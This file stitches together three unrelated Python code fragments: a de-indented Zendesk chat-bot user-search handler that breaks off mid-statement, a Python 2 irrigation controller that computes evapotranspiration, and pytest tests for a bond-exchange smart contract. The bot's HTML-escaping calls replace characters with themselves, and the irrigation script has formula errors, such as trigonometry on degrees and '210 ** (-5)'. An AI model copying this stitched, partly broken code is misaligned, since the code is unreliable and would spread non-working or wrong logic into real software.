url = _configDef['zdesk_config']['zdesk_url'] + "/api/v2/search"
# User search only
if userEntered and orgEntered == False:
#print("inside user and no org")
query += "type:user\"" + str(userSplit[1:]) + "\""
querystring = {"query": "type:user " + str(userSplit[1:]) + ""}
# print(querystring)
response = requests.request("GET", str(url), headers=headers, params=querystring)
data = response.json()
# print(str(data))
dataLenght = len(str(data))
# print(str(dataLenght))
# if dataLenght >= 50000:
# return messageDetail.ReplyToChat("There are few results for this user search, please try with the full name or/and with the company name")
noUserFound = "{'results': [], 'facets': None, 'next_page': None, 'previous_page': None, 'count': 0}"
if str(data).startswith(noUserFound):
return messageDetail.ReplyToChat("There is no user with this information")
if query == "type:user\"\"":
return messageDetail.ReplyToChat(
"You have searched for all users on your Zendesk, I will ignore this request to avoid any performance issue")
else:
#botlog.LogSymphonyInfo("Getting user information from Zendesk")
messageDetail.ReplyToChat("Getting user information from Zendesk, please wait")
# User and Organisation search
if userEntered and orgEntered:
#print("inside user and org")
org_legnth = len(str(organization[1:]))
#print(int(org_legnth))
if org_legnth == "" or int(org_legnth) < 2:
return messageDetail.ReplyToChat("You did not enter a valid organization, please check and try again")
query += "type:user" + str(userSplit) + " organization:" + str(organization[1:])
botlog.LogSymphonyInfo("Query used " + str(query))
querystring = {"query": "type:user" + str(userSplit) + " organization:" + str(organization[1:]) + ""}
botlog.LogSymphonyInfo("Entire query used " + str(querystring))
if str(query).startswith("type:user organization:"):
messageDetail.ReplyToChat("Please check your 1:1 IM with me to see the full list of users from " + str(organization[1:]))
messageDetail.ReplyToSenderv2("Hi " + str(caller) + ", Loading all users from Zendesk under organization <b>" + str(
organization[1:]) + "</b>, please wait")
isIM = True
response = requests.request("GET", url, headers=headers, params=querystring)
data = response.json()
print(str(data))
noRes = "{'results': [], 'facets': {'type': {'entry': 0, 'ticket': 0, 'organization': 0, 'user': 0, 'article': 0, 'group': 0}}, 'next_page': None, 'previous_page': None, 'count': 0}"
if str(data) == str(noRes):
return messageDetail.ReplyToSenderv2_noBotLog("There is no result for this search: " + str(query))
if str(data).startswith(
"{'results': [], 'facets': None, 'next_page': None, 'previous_page': None, 'count': 0}"):
return messageDetail.ReplyToChat(
"This user does not exist on Zendesk, name is misspelled or does not belong to this organisation")
elif str(data).startswith(
"{'results': [], 'facets': {'type': {'entry': 0, 'ticket': 0, 'organization': 0, 'user': 0, 'article': 0, 'group': 0}}, 'next_page': None, 'previous_page': None, 'count': 0}"):
return messageDetail.ReplyToChat("This organisation/company does not exist in Zendesk or is misspelled")
else:
#messageDetail.ReplyToChat("Getting user information from Zendesk, please wait")
botlog.LogSymphonyInfo("Getting user information from Zendesk, please wait")
table_body = ""
table_header = "<table style='border-collapse:collapse;border:2px solid black;table-layout:auto;width:100%;box-shadow: 5px 5px'><thead><tr style='background-color:#4D94FF;color:#ffffff;font-size:1rem' class=\"tempo-text-color--white tempo-bg-color--black\">" \
"<td style='width:25%;border:1px solid blue;border-bottom: double blue;text-align:center'>NAME</td>" \
"<td style='width:25%;border:1px solid blue;border-bottom: double blue;text-align:center'>EMAIL ADDRESS</td>" \
"<td style='width:25%;border:1px solid blue;border-bottom: double blue;text-align:center'>COMPANY</td>" \
"<td style='width:25%;border:1px solid blue;border-bottom: double blue;text-align:center'>ROLE</td>" \
"</tr></thead><tbody>"
for result in data['results']:
name = str(result["name"])
zdID = str(result["id"])
###############################
conn = http.client.HTTPSConnection(_configDef['zdesk_config']['zdesk_api'])
headers = {
'username': _configDef['zdesk_config']['zdesk_email'] + "/token",
'password': _configDef['zdesk_config']['zdesk_password'],
'authorization': _configDef['zdesk_config']['zdesk_auth'],
'cache-control': "no-cache",
'Content-Type': 'application/json',
}
# To get the name of the requester given the requesterID
conn.request("GET", "/api/v2/users/" + str(zdID) + "/organizations", headers=headers)
res = conn.getresponse()
organizationsID = res.read()
tempOrganizationsID = str(organizationsID.decode('utf-8'))
noOrgUser = '{"organizations":[],"next_page":null,"previous_page":null,"count":0}'
if tempOrganizationsID == noOrgUser:
noOrgUserFlag = True
else:
noOrgUserFlag = False
data_dict = json.loads(str(tempOrganizationsID))
data = json.dumps(data_dict, indent=2)
# data_dict = ast.literal_eval(data)
d_req = json.loads(data)
# data = json.dumps(tempOrganizationsID, indent=2)
# data_dict = ast.literal_eval(data)
# d_req = json.loads(str(data_dict))
try:
org_Name = str(d_req["organizations"][0]["name"])
org_name_temp = str(org_Name).replace("<", "<").replace("\"", """).replace("&","&").replace("'", "'").replace(">", ">")
org_Name = str(org_name_temp)
except:
org_Name = "None"
###############################
comData = org_Name
email = str(result["email"])
try:
organization_id = str(result["organization_id"])
except:
organization_id = "None"
userZRole = str(result["role"])
orglink = (_configDef['zdesk_config']['zdesk_org']) + str(organization_id) + "/tickets"
user_link = (_configDef['zdesk_config']['zdesk_user']) + str(zdID) + "/requested_tickets"
if noOrgUserFlag:
table_body += "<tr>" \
"<td style='border:1px solid black;text-align:center'><a href=\"" + str(user_link) + "\">" + str(name) + "</a></td>" \
"<td style='border:1px solid black;text-align:center'><a href=\"mailto:" + str(email) + "?Subject=Symphony%20Communication\">" + str(email) + "</a></td>" \
"<td style='border:1px solid black;text-align:center'>None</td>" \
"<td style='border:1px solid black;text-align:center'>" + str(userZRole) + "</td>" \
"</tr>"
else:
table_body += "<tr>" \
"<td style='border:1px solid black;text-align:center'><a href=\"" + str(user_link) + "\">" + str(name) + "</a></td>" \
"<td style='border:1px solid black;text-align:center'><a href=\"mailto:" + str(email) + "?Subject=Symphony%20Communication\">" + str(email) + "</a></td>" \
"<td style='border:1px solid black;text-align:center'><a href=\"" + str(orglink) + "\">" + str(comData) + "</a></td>" \
"<td style='border:1px solid black;text-align:center'>" + str(userZRole) + "</td>" \
"</tr>"
table_body += "</tbody></table>"
reply = table_header + table_body
if isIM:
#return messageDetail.ReplyToSenderv2_noBotLog("<card iconSrc=\"https://thumb.ibb.co/csXBgU/Symphony2018_App_Icon_Mobile.png\" accent=\"tempo-bg-color--blue\"><header>These are all the users under the organisation <b>" + organization[1:] + "</b></header><body>" + reply + "</body></card>")
return messageDetail.ReplyToSenderv2_noBotLog("<card iconSrc=\"\" accent=\"tempo-bg-color--blue\"><header>These are all the users under the organisation <b>" + organization[1:] + "</b></header><body>" + reply + "</body></card>")
else:
#return messageDetail.ReplyToChatV2_noBotLog("<card iconSrc =\"https://thumb.ibb.co/csXBgU/Symphony2018_App_Icon_Mobile.png\" accent=\"tempo-bg-color--blue\"><header>Please find the result below</header><body>" + reply + "</body></card>")
return messageDetail.ReplyToChatV2_noBotLog("<card iconSrc =\"\" accent=\"tempo-bg-color--blue\"><header>Please find the result below</header><body>" + reply + "</body></card>")
else:
return messageDetail.ReplyToChat(
"You aren't authorised to use this command. You are either not Added to the Bot as an Agent or you are not an Agent/Staff on Zendesk")
except:
try:
botlog.LogSymphonyInfo("Inside second try for UserZD")
isAllowed = False
commandCallerUID = messageDetail.FromUserId
connComp.request("GET", "/pod/v3/users?uid=" + commandCallerUID, headers=headersCompany)
resComp = connComp.getresponse()
dataComp = resComp.read()
data_raw = str(dataComp.decode('utf-8'))
# data_dict = ast.literal_eval(data_raw)
data_dict = json.loads(str(data_raw))
dataRender = json.dumps(data_dict, indent=2)
d_org = json.loads(dataRender)
for index_org in range(len(d_org["users"])):
firstName = d_org["users"][index_org]["firstName"]
lastName = d_org["users"][index_org]["lastName"]
displayName = d_org["users"][index_org]["displayName"]
#companyName = d_org["users"][index_org]["company"]
companyNameTemp = d_org["users"][index_org]["company"]
companyTemp = str(companyNameTemp).replace("&", "&").replace("<", "<").replace('"', """).replace("'", "'").replace(">", ">")
companyName = str(companyTemp)
userID = str(d_org["users"][index_org]["id"])
#################################################
try:
emailAddress = str(d_org["users"][index_org]["emailAddress"])
# print("User is connected: " + emailAddress)
emailZendesk = emailAddress
connectionRequired = False
except:
connectionRequired = True
# if connectionRequired:
data_lenght = len(dataComp)
if data_lenght > 450:
try:
# print("inside > 450")
query = "type:user " + emailAddress
except:
query = "type:user " + firstName + " " + lastName
#print("Query used to search Zendesk user" + query)
elif data_lenght < 450:
try:
# print("inside < 450")
# query = "type:user " + emailAddress + " organization:" + companyName
query = "type:user " + emailAddress
except:
# query = "type:user " + firstName + " " + lastName + " organization:" + companyName
query = "type:user " + firstName + " " + lastName
#print("Query used to search Zendesk user" + query)
else:
return messageDetail.ReplyToChat("No user information available")
botlog.LogSymphonyInfo(query)
results = zendesk.search(query=query)
# print(results)
if str(results).startswith(
"{'results': [], 'facets': None, 'next_page': None, 'previous_page': None, 'count': 0}"):
return messageDetail.ReplyToChat(
"This user does not exist on Zendesk, the name is misspelled or does not belong to this organisation.")
elif str(results).startswith(
"{'results': [], 'facets': {'type': {'entry': 0, 'ticket': 0, 'organization': 0, 'user': 0, 'article': 0, 'group': 0}}, 'next_page': None, 'previous_page': None, 'count': 0}"):
return messageDetail.ReplyToChat(
"This organisation/company does not exist in Zendesk or name is misspelled.")
else:
data = json.dumps(results, indent=2)
d = json.loads(data)
for index in range(len(d["results"])):
# name = d["results"][index]["name"]
# email = str(d["results"][index]["email"])
role = str(d["results"][index]["role"])
# print(role)
#botlog.LogSymphonyInfo("The calling user is a Zendesk " + role)
if | |
# gw1/wat1.py
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from datetime import datetime,date
import time
import calendar
import json
import math
import os,sys
import socket
import traceback
import urllib2 as urllib
# --- Runtime configuration -------------------------------------------------
user = "GW1"
test = False
# Test mode talks to the remote greenwall server; otherwise the local API.
if test:
    host = "greenwall.gembloux.uliege.be"
else:
    host = "localhost"
# Ensure to run in the user home directory
DIR_BASE = os.path.expanduser("~")
if not os.path.samefile(os.getcwd(), DIR_BASE):
    os.chdir(DIR_BASE)
print(os.getcwd())
# Ensure to be the only instance running: binding an abstract-namespace UNIX
# socket acts as a system-wide lock that disappears when the process dies.
pid = str(os.getpid())
_lock_socket = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
try:
    _lock_socket.bind('\0'+user)
    print('Socket '+user+' now locked for process #' + pid)
    # Make the current pid available to be able to kill the process...
    with open("pid.txt", 'w') as pid_file:  # was open(...).write(): leaked handle
        pid_file.write(pid)
except socket.error:
    with open("pid.txt", 'r') as pid_file:
        current = pid_file.read()
    print(user+' lock exists for process #' + current + " : may be you should ./clean.sh !")
    sys.exit()
# EPOCH time: seconds elapsed since 1970-01-01.
def get_timestamp():
    """Return the current UNIX timestamp as an integer."""
    now = time.time()
    return int(now)
# Transform an EPOCH time in a lisible date (for Grafana)
def formatDate(epoch):
    """Render an epoch timestamp as an ISO-8601 local-time string (for Grafana)."""
    return datetime.fromtimestamp(epoch).isoformat()
# Transform an EPOCH time in a lisible date (for Grafana)
def formatDateGMT(epoch):
dt = datetime.fromtimestamp(epoch - (2 * 60 * 60) ) # We are in summer and in Belgium !
return dt.isoformat()
# Characters stripped from raw API responses before numeric conversion.
delimiters = ' \t\n\r\"\''
# Getting the list of all available sensors
dataFile = None
try: # urlopen not usable with "with"
    url = "http://" +host +"/api/grafana/search"
    dataFile = urllib.urlopen(url, json.dumps(""), 20)
    result = json.load(dataFile)
    for index in result:
        print(index)
except:
    # Best-effort diagnostic: log the failing URL and the traceback, keep going.
    print(u"URL=" + (url if url else "") + \
          u", Message=" + traceback.format_exc())
if dataFile:
    dataFile.close()
# Evapotranspiration (mm) carried over to the next iteration when the moisture
# probes are judged faulty (used by irrigation plans B/C in the main loop).
supplement_ET0=0
# Your program must create a data file with one column with the Linux EPOCH time and your valve state (0=closed, 1=opened)
while (True):
print("######## Nouvelle irrigation : " + time.strftime("%A %d %B %Y %H:%M:%S") + " ########") # indique qu'une nouvelle irrigation a eu lieu tel jour et à tel heure
print("")
# Recueil des dernières valeurs de tension des capteurs d'humidité
dataFile = None
humidite= [[] for b in range(2)] # liste stockant les dernières valeurs d'humidité avant puis après irrigation
for g in range(1, 4): # boucle collectant les 3 dernières valeurs de nos capteurs d'humidité
try: # urlopen not usable with "with"
url = "http://" + host + "/api/get/%21s_HUM" + unicode(g)
dataFile = urllib.urlopen(url, None, 20)
data = dataFile.read(80000)
humidite[0].append((float(data.strip(delimiters)))) # ajout de la valeur receuillie en fin de liste
except:
print(u"URL=" + (url if url else "") + \
u", Message=" + traceback.format_exc())
if dataFile:
dataFile.close()
# Conversion des tensions en teneur en eau puis trie de celles-ci par ordre croissant
for o in range(0, 3):
humidite[0][o] = ((35.24 * humidite[0][o] - 15.44) / (humidite[0][o] - 0.3747)) / 100
humidite[0].sort() # trie les valeurs d'humidité dans l'ordre croissant
affichage_capteurs=list(humidite[0]) # fait une copie pour permettre de rendre les valeurs à afficher plus lisibles tout en gardant les données d'origine
for k in range(0,3): # méthode qui transforme la valeur entre 0 et 1 en un pourcentage avec 4 chiffres après la virgule
affichage_capteurs[k]=round(affichage_capteurs[k]*100,4)
affichage_capteurs.sort()
print("Valeurs des capteurs d'humidité avant le test de qualité (%) : "+str(affichage_capteurs).strip('[]')) # affiche les valeurs de nos capteurs en pourcent
# Vérification des données d'humidité
t=0
if humidite[0][1]-humidite[0][0]>0.08 : # regarde si la différence entre la plus petite valeur et la valeur centrale est strictement supérieure à 8%
del humidite[0][0]
t=1
elif humidite[0][2]-humidite[0][1]>0.08:
del humidite[0][2]
t+=2
# Permet d'afficher le nombre de données supprimées
if t==3: # correspond à l'effacement de 2 données
z=2
elif t==2: # correspond à l'effacement du max mais ce n'est qu'une donnée
z=1
else:
z=t # sinon le t correspond au nombre de données supprimées
print("Capteurs défaillants : "+str(z)) # indique le nombre de capteurs qui nous semble défectueux
# Combien de valeurs reste-t-il ?
if t!=3:
moyenne_humidite=[sum(humidite[0])/len(humidite[0])]
supplement_ET0=0 # remet à 0 le complément d'irrigation si entre temps les sondes sont redevenues fonctionnelles
print("Plan effectué : plan A")
print("Teneur en eau moyenne avant irrigation : "+str(round(moyenne_humidite[0]*100,4))+" %")
# Où se situe l'humidité moyenne ?
if moyenne_humidite[0]>0.285: # regarde si elle est supérieure à la CC
V_irrigation=0 # y'a assez d'eau on n'irrigue pas
ET0=0
print("Volume irrigué : 0 mL")
else:
V_irrigation = (0.285 - moyenne_humidite[0]) * 12.6 # volume d'irrigation nécessaire pour atteindre la CC
print("Volume irrigué : "+str(int(V_irrigation*1000))+" mL")
else:
# Receuil des données météo des 24 dernières heures et nécessaires au calcul de l'ETP
dataFile = None
meteo = [[] for i in range(6)] # tableau permettant le stockage des valeurs receuillies
j = 0 # variable de changement de colonne dans le tableau
try: # urlopen not usable with "with"
url = "http://" + host + "/api/grafana/query"
now = get_timestamp()
gr = {'range': {'from': formatDateGMT(now - (24 * 60 * 60)), 'to': formatDateGMT(now)}, \
'targets': [{'target': 'SDI0'}, {'target': 'SDI4'}, {'target': 'SDI7'}, {'target': 'SDI8'},
{'target': 'SDI9'}, {'target': 'SDI10'}, ]}
data = json.dumps(gr)
dataFile = urllib.urlopen(url, data, 20)
result = json.load(dataFile)
if result:
for target in result:
index = target.get('target')
for datapoint in target.get('datapoints'):
value = datapoint[0]
stamp = datapoint[1] / 1000
meteo[j].append(
float(value)) # ajoute les données dans le tableau en dernière ligne de la colonne j
j += 1 # permet de passer à la colonne suivante
except:
print(u"URL=" + (url if url else "") + \
u", Message=" + traceback.format_exc())
if dataFile:
dataFile.close()
# Calcul de l'ETP des 24 dernières heures
ET0 = 0 # initialisation de la valeur de ET0
Kc = 1 # valeur du coefficient cultural
v = [] # variable permettant de trouver la taille de ma boucle for car sur 24h il se peut que l'on ne collecte pas exactement 1440 valeurs, cela évite donc de faire planter ma boucle for
for i in range(0, len(
meteo)): # stocke dans ma liste le nombre de données collectées sur l'heure précédente pour chaque capteur
v.append(len(meteo[i]))
for q in range(0, min(v)): # calcul de l'ET0 par minute avec les données précédemment collectées dans meteo
delta = (4098 * (0.6108 * math.exp((17.27 * meteo[2][q]) / (meteo[2][q] + 237.3)))) / (
(meteo[2][q] + 237.3) ** 2)
es = 100 * meteo[3][q] / meteo[5][q]
ea = meteo[3][q]
altitude = 106 # pour Mont-Saint-Guilbert (159 si Gembloux)
albedo = 0.2
Rs = meteo[0][q] * 10 ** (-6) * 60
Rns = (1 - albedo) * Rs
lat = 50
sigma = 4.903 * 10 ** (-9) / (24 * 60)
J = (date.today() - date(2020, 1,1)).days + 1 # représente le nombre de jours passés depuis le 1er janvier 2020 compris
dr = 1 + 0.033 * math.cos((6.28 / 365) * J)
declinaison = 0.409 * math.sin((6.28 / 365) * J - 1.39)
ws = math.acos(-math.tan(lat) * math.tan(declinaison))
Ra = (1/ 3.14) * 0.082 * dr * (ws * math.sin(lat) * math.sin(declinaison) + math.sin(ws) * math.cos(lat) * math.cos(declinaison))
Rso = (0.75 + 210 ** (-5) * altitude) * Ra
Rnl = sigma * (meteo[2][q] + 273.15) * (0.34 * 0.14 * ea ** 0.5) * (1.35 * (Rs / Rso) - 0.35)
Rn = Rns - Rnl
gamma = 0.665 * meteo[4][q] * 10 ** (-3)
vitesse_du_vent = meteo[1][q]
ET0 += (0.408 * delta * Rn + gamma * (0.625 / (273 + meteo[2][q])) * vitesse_du_vent * (es - ea)) / (delta + gamma * (1 + 0.34 * vitesse_du_vent)) # stocke la somme des ET0 calculés pour chaque minute
print("ET0 des 24 dernières heures "+str (ET0)+" mm")
if 0<ET0<9:
print("Pan effectué : plan B")
ETR = (ET0+supplement_ET0) * Kc # valeur réelle de l'ETP en considérant le type et le stade de la culture
V_irrigation = ETR * 10 ** (-2) * 10.5 # volume qui a été perdu par évapotranspiration
moyenne_humidite= [humidite[0]]
print("Volume irrigué : "+str(int(V_irrigation*1000))+" mL")
print("Teneur en eau moyenne avant irrigation : "+str(round(moyenne_humidite[0]*100,4))+" %")
else:
print("Plan effectué : plan C")
ET0=float(open("../WatWall/gw1/ET0.csv", 'r').read().split("\n")[J - 1]) # trouve la valeur moyenne d'ET0 pour aujourd'hui dans notre fichier
print("Nouvelle valeur d'ET0 : "+str(ET0))
ETR = (ET0+supplement_ET0) * Kc
V_irrigation = ETR * 10 ** (-2) * 10.5
| |
"""
Copyright BOOSTRY Co., Ltd.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
SPDX-License-Identifier: Apache-2.0
"""
import pytest
from eth_utils import to_checksum_address
import utils
'''
共通処理
'''
# PersonalInfo登録
def personalinfo_register(personalinfo, trader, issuer):
    """Register the trader's personal info with the issuer on the PersonalInfo contract."""
    message = 'some_message'
    personalinfo.register.transact(issuer, message, {'from': trader})
# PaymentGatewayアカウント登録
def payment_gateway_register(payment_gateway, trader, agent):
    """Register the trader's PaymentGateway account with the given agent (not yet approved)."""
    message = 'some_message'
    payment_gateway.register.transact(agent, message, {'from': trader})
# PaymentGatewayアカウント認可
def payment_gateway_approve(payment_gateway, trader, agent):
    """Have the agent approve the trader's PaymentGateway account."""
    payment_gateway.approve.transact(trader, {'from': agent})
# Bondトークンを取引所にデポジット
def bond_transfer(bond_token, bond_exchange, trader, amount):
    """Deposit `amount` bond tokens into the exchange on behalf of the trader."""
    bond_token.transfer.transact(
        bond_exchange.address, amount, {'from': trader})
'''
TEST_デプロイ
'''
# <正常系1>
# Deploy → 正常
def test_deploy_normal_1(users, bond_exchange, bond_exchange_storage,
                         personal_info, payment_gateway):
    """Normal case 1: deployment records the owner and the linked contract addresses."""
    owner = bond_exchange.owner()
    personal_info_address = bond_exchange.personalInfoAddress()
    payment_gateway_address = bond_exchange.paymentGatewayAddress()
    storage_address = bond_exchange.storageAddress()
    assert owner == users['admin']
    assert personal_info_address == to_checksum_address(personal_info.address)
    assert payment_gateway_address == to_checksum_address(payment_gateway.address)
    assert storage_address == to_checksum_address(bond_exchange_storage.address)
# <エラー系1>
# 入力値の型誤り(PaymentGatewayアドレス)
def test_deploy_error_1(users, IbetStraightBondExchange, personal_info):
    """Error case 1: a non-address value for the PaymentGateway argument raises ValueError."""
    exchange_owner = users['admin']
    with pytest.raises(ValueError):
        exchange_owner.deploy(
            IbetStraightBondExchange,
            1234,
            personal_info.address
        )
# <エラー系2>
# 入力値の型誤り(PersonalInfoアドレス)
def test_deploy_error_2(users, IbetStraightBondExchange, payment_gateway):
    """Error case 2: a non-address value for the PersonalInfo argument raises ValueError."""
    exchange_owner = users['admin']
    with pytest.raises(ValueError):
        exchange_owner.deploy(
            IbetStraightBondExchange,
            payment_gateway.address,
            1234
        )
'''
TEST_Make注文(createOrder)
'''
# 正常系1
# <発行体>新規発行 -> <投資家>新規注文(買)
def test_createorder_normal_1(users, bond_exchange, personal_info, payment_gateway):
    """Normal case 1: issuer issues a new token, then a buy order is created and stored."""
    issuer = users['issuer']
    agent = users['agent']
    personalinfo_register(personal_info, issuer, issuer)
    payment_gateway_register(payment_gateway, issuer, agent)
    payment_gateway_approve(payment_gateway, issuer, agent)
    # Issue a new bond token
    bond_token, deploy_args = utils. \
        issue_bond_token(users, bond_exchange.address, personal_info.address)
    # Create a new order (buy)
    _amount = 100
    _price = 123
    _isBuy = True
    bond_exchange.createOrder.transact(
        bond_token.address, _amount, _price, _isBuy, agent, {'from': issuer})
    order_id = bond_exchange.latestOrderId()
    orderbook = bond_exchange.getOrder(order_id)
    assert orderbook == [
        issuer.address, to_checksum_address(bond_token.address), _amount, _price,
        _isBuy, agent.address, False
    ]
    # Buy orders move no tokens, so the issuer's balance is untouched.
    assert bond_token.balanceOf(issuer) == deploy_args[2]
# 正常系2
# <発行体>新規発行 -> <発行体>新規注文(売)
def test_createorder_normal_2(users,
                              bond_exchange, personal_info, payment_gateway):
    """Normal case 2: issuer issues a token, deposits it, then creates a sell order."""
    issuer = users['issuer']
    agent = users['agent']
    personalinfo_register(personal_info, issuer, issuer)
    payment_gateway_register(payment_gateway, issuer, agent)
    payment_gateway_approve(payment_gateway, issuer, agent)
    # Issue a new bond token
    bond_token, deploy_args = utils. \
        issue_bond_token(users, bond_exchange.address, personal_info.address)
    # Deposit into the exchange
    _amount = 100
    bond_token.transfer.transact(bond_exchange.address, _amount, {'from': issuer})
    # Create a new order (sell)
    _price = 123
    _isBuy = False
    bond_exchange.createOrder.transact(
        bond_token.address, _amount, _price, _isBuy, agent, {'from': issuer})
    order_id = bond_exchange.latestOrderId()
    orderbook = bond_exchange.getOrder(order_id)
    commitment = bond_exchange.commitmentOf(issuer, bond_token.address)
    balance = bond_token.balanceOf(issuer)
    assert orderbook == [
        issuer.address, to_checksum_address(bond_token.address), _amount, _price,
        _isBuy, agent.address, False
    ]
    # The deposited amount moves from the issuer's balance into the exchange commitment.
    assert balance == deploy_args[2] - _amount
    assert commitment == _amount
# エラー系1
# 入力値の型誤り(_token)
def test_createorder_error_1(users, bond_exchange):
    """Error case 1: a non-address value for _token raises ValueError."""
    issuer = users['issuer']
    agent = users['agent']
    # Order parameters (never reach the chain: the token address is invalid)
    _price = 123
    _isBuy = False
    _amount = 100
    for bad_token in ('1234', 1234):
        with pytest.raises(ValueError):
            bond_exchange.createOrder.transact(bad_token, _amount, _price, _isBuy, agent, {'from': issuer})
# エラー系2
# 入力値の型誤り(_amount)
def test_createorder_error_2(users, bond_exchange, personal_info):
    """Error case 2: invalid _amount (negative, above uint256, non-numeric)."""
    issuer = users['issuer']
    agent = users['agent']
    # Issue a new bond token
    bond_token, deploy_args = utils. \
        issue_bond_token(users, bond_exchange.address, personal_info.address)
    # Create a new order
    _price = 123
    _isBuy = False
    with pytest.raises(OverflowError):
        bond_exchange.createOrder.transact(
            bond_token.address, -1, _price, _isBuy, agent, {'from': issuer})
    with pytest.raises(OverflowError):
        bond_exchange.createOrder.transact(
            bond_token.address, 2 ** 256, _price, _isBuy, agent, {'from': issuer})
    with pytest.raises(TypeError):
        bond_exchange.createOrder.transact(
            bond_token.address, 'abc', _price, _isBuy, agent, {'from': issuer})
# エラー系3
# 入力値の型誤り(_price)
def test_createorder_error_3(users, bond_exchange, personal_info):
    """Error case 3: invalid _price (negative, above uint256, non-numeric)."""
    issuer = users['issuer']
    agent = users['agent']
    # Issue a new bond token
    bond_token, deploy_args = utils. \
        issue_bond_token(users, bond_exchange.address, personal_info.address)
    # Create a new order
    _amount = 100
    _isBuy = False
    with pytest.raises(OverflowError):
        bond_exchange.createOrder.transact(
            bond_token.address, _amount, -1, _isBuy, agent, {'from': issuer})
    with pytest.raises(OverflowError):
        bond_exchange.createOrder.transact(
            bond_token.address, _amount, 2 ** 256, _isBuy, agent, {'from': issuer})
    with pytest.raises(TypeError):
        bond_exchange.createOrder.transact(
            bond_token.address, _amount, 'abc', _isBuy, agent, {'from': issuer})
# エラー系4
# 入力値の型誤り(_isBuy)
def test_createorder_error_4(users, bond_exchange, personal_info):
    """Error case 4: non-boolean values for _isBuy raise ValueError."""
    issuer = users['issuer']
    agent = users['agent']
    # Issue a new bond token
    bond_token, deploy_args = utils. \
        issue_bond_token(users, bond_exchange.address, personal_info.address)
    # Create a new order
    _amount = 100
    _price = 123
    with pytest.raises(ValueError):
        bond_exchange.createOrder.transact(
            bond_token.address, _amount, _price, 1234, agent, {'from': issuer})
    with pytest.raises(ValueError):
        bond_exchange.createOrder.transact(
            bond_token.address, _amount, _price, 'True', agent, {'from': issuer})
# エラー系5
# 入力値の型誤り(_agent)
def test_createorder_error_5(users, bond_exchange, personal_info):
    """Error case 5: a non-address value for _agent raises ValueError."""
    issuer = users['issuer']
    # Issue a new bond token
    bond_token, deploy_args = utils. \
        issue_bond_token(users, bond_exchange.address, personal_info.address)
    # Create a new order
    _price = 123
    _isBuy = False
    _amount = 100
    with pytest.raises(ValueError):
        bond_exchange.createOrder.transact(
            bond_token.address, _amount, _price, _isBuy, '1234', {'from': issuer})
    with pytest.raises(ValueError):
        bond_exchange.createOrder.transact(
            bond_token.address, _amount, _price, _isBuy, 1234, {'from': issuer})
# エラー系6-1
# 買注文数量が0の場合
def test_createorder_error_6_1(users,
                               bond_exchange, personal_info, payment_gateway):
    """Error case 6-1: a buy order with amount 0 fails and leaves state unchanged."""
    issuer = users['issuer']
    agent = users['agent']
    personalinfo_register(personal_info, issuer, issuer)
    payment_gateway_register(payment_gateway, issuer, agent)
    payment_gateway_approve(payment_gateway, issuer, agent)
    # Issue a new bond token
    bond_token, deploy_args = utils. \
        issue_bond_token(users, bond_exchange.address, personal_info.address)
    # Create a new order (buy)
    _amount = 0
    _price = 123
    _isBuy = True
    bond_exchange.createOrder.transact(bond_token.address, _amount, _price, _isBuy, agent, {'from': issuer})  # expected to fail
    commitment = bond_exchange.commitmentOf(issuer, bond_token.address)
    balance = bond_token.balanceOf(issuer)
    assert balance == deploy_args[2]
    assert commitment == 0
# エラー系6-2
# 売注文数量が0の場合
def test_createorder_error_6_2(users,
                               bond_exchange, personal_info, payment_gateway):
    """Error case 6-2: a sell order with amount 0 fails; the deposit is returned."""
    issuer = users['issuer']
    agent = users['agent']
    personalinfo_register(personal_info, issuer, issuer)
    payment_gateway_register(payment_gateway, issuer, agent)
    payment_gateway_approve(payment_gateway, issuer, agent)
    # Issue a new bond token
    bond_token, deploy_args = utils. \
        issue_bond_token(users, bond_exchange.address, personal_info.address)
    # Deposit into the exchange
    _amount = 100
    bond_token.transfer.transact(bond_exchange.address, _amount, {'from': issuer})
    # Create a new order (sell) with zero amount
    _amount = 0
    _price = 123
    _isBuy = False
    bond_exchange.createOrder.transact(
        bond_token.address, _amount, _price, _isBuy, agent, {'from': issuer})  # expected to fail
    commitment = bond_exchange.commitmentOf(issuer, bond_token.address)
    balance = bond_token.balanceOf(issuer)
    # The failed order hands the deposited tokens back to the issuer.
    assert balance == deploy_args[2]
    assert commitment == 0
# エラー系7-1
# 未認可のアカウントアドレスからの注文(買)
def test_createorder_error_7_1(users,
                               bond_exchange, personal_info, payment_gateway):
    """Error case 7-1: a BUY order from an account whose payment-gateway
    registration has not been approved must fail and leave state unchanged.

    Fix: the case is titled "order (buy)" but previously sent ``_isBuy = False``
    (a sell with no deposit), so it failed for lack of balance rather than for
    the missing approval this case is meant to exercise. The final assertions
    hold either way, since buy orders never move tokens.
    """
    issuer = users['issuer']
    agent = users['agent']
    personalinfo_register(personal_info, issuer, issuer)
    payment_gateway_register(payment_gateway, issuer, agent)  # left unapproved
    # Issue a new bond token
    bond_token, deploy_args = utils. \
        issue_bond_token(users, bond_exchange.address, personal_info.address)
    # Create a new order (buy)
    _amount = 100
    _price = 123
    _isBuy = True
    bond_exchange.createOrder.transact(
        bond_token.address, _amount, _price, _isBuy, agent, {'from': issuer})  # expected to fail
    commitment = bond_exchange.commitmentOf(issuer, bond_token.address)
    balance = bond_token.balanceOf(issuer)
    assert balance == deploy_args[2]
    assert commitment == 0
# エラー系7-2
# 未認可のアカウントアドレスからの注文(売)
def test_createorder_error_7_2(users,
                               bond_exchange, personal_info):
    """Error case 7-2: a sell order from an unapproved account fails; deposit returned."""
    issuer = users['issuer']
    agent = users['agent']
    personalinfo_register(personal_info, issuer, issuer)  # payment gateway left unregistered/unapproved
    # Issue a new bond token
    bond_token, deploy_args = utils. \
        issue_bond_token(users, bond_exchange.address, personal_info.address)
    # Deposit into the exchange
    _amount = 100
    bond_token.transfer.transact(bond_exchange.address, _amount, {'from': issuer})
    # Create a new order (sell)
    # NOTE(review): _amount = 0 makes this order fail for the zero-amount rule
    # (case 6-2) before the authorization path is reached; it probably should
    # stay 100 to exercise the unapproved-account check — confirm against the
    # contract and fix the fixture if so.
    _amount = 0
    _price = 123
    _isBuy = False
    bond_exchange.createOrder.transact(
